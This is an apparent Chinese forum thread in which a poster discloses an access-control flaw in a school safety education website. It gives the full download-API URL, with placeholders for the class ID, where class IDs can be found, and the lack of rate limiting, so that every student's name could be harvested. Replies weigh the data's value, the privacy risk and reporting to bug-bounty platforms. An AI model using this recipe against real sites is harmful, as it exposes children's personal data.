学校安全教育平台网站的漏洞

陈布衣

学校安全教育平台 https://www.xueanquan.com/  

有一个活动里的功能，叫下载全班完成情况。
结果没有加限制，可以任意下载任何班级的完成情况。
从而获得盗取别人班级的全部姓名。
下载链接为  

1. https://huodongapi.xueanquan.com/p/省份拼音/Topic/topic/platformapi/api/v1/holiday/statistics-download?schoolYear=2020&semester=1&areaId=班级编号&areaType=Class&nowPage=1&pageSize=20&isPage=true&isKindergarten=true&cityName=undefined

复制代码

只要把链接里的省份拼音和班级编号填上就可以下载了。
下载过来为 excel 文件

班级编号可以从这里获得：  https://www.xueanquan.com/Main/PasswordBack.aspx


这样，经过搜集和整理，可以下载到这个网站全部学生的姓名
并且这个网站貌似不对单一IP有访问频率限制

大能猫

Ink_Hin_fifteen 发表于 2020-5-13 19:44
有一个大胆的假设，如果被一些培训机构，教育机构，补课班之类的拿到这些呢？ 虽然说到被电信诈骗倒不怎 ...

首先emmm。。。安全教育网站可能是指消防安全交通安全之类的，没太大关系
然后培训机构之类的拿信息肯定是从一些渠道商买的，这些渠道商应该是从各方搜集的信息，信息提供方其实可能是各大网站甚至银行之类的（我觉得很多人应该也不是第一次听说注册银行卡或者一些网站的时候他们会偷偷卖掉你的信息吧）。当然像这种教育网站泄露是一部分，但是应该比较少流入市场或者要洗白一下再流入，因为脱这种裤子是违法的

德小SHUO

这个漏洞貌似没啥用…

大能猫

德小SHUO 发表于 2020-5-1 17:29
这个漏洞貌似没啥用…

当裤子用啊，不过就是没太多敏感信息

Ink_Hin_fifteen

似乎已经不能用了，还想看看能不能查到弟弟的班级信息。
不过真是讽刺啊，号称安全教育网站，居然放出了这么一个漏洞。

Ink_Hin_fifteen

大能猫 发表于 2020-5-13 04:50
当裤子用啊，不过就是没太多敏感信息

有一个大胆的假设，如果被一些培训机构，教育机构，补课班之类的拿到这些呢？ 虽然说到被电信诈骗倒不怎么至于，但隐私还是要保管好的，否则肯定会给生活带来一大堆麻烦。

德小SHUO

Ink_Hin_fifteen 发表于 2020-5-13 19:44
有一个大胆的假设，如果被一些培训机构，教育机构，补课班之类的拿到这些呢？ 虽然说到被电信诈骗倒不怎 ...

原来如此！懂了懂了

nanako

可以放进相应的SRC平台哦，或者看看补天里有没有呢><
还可以有机会拿个证书什么的）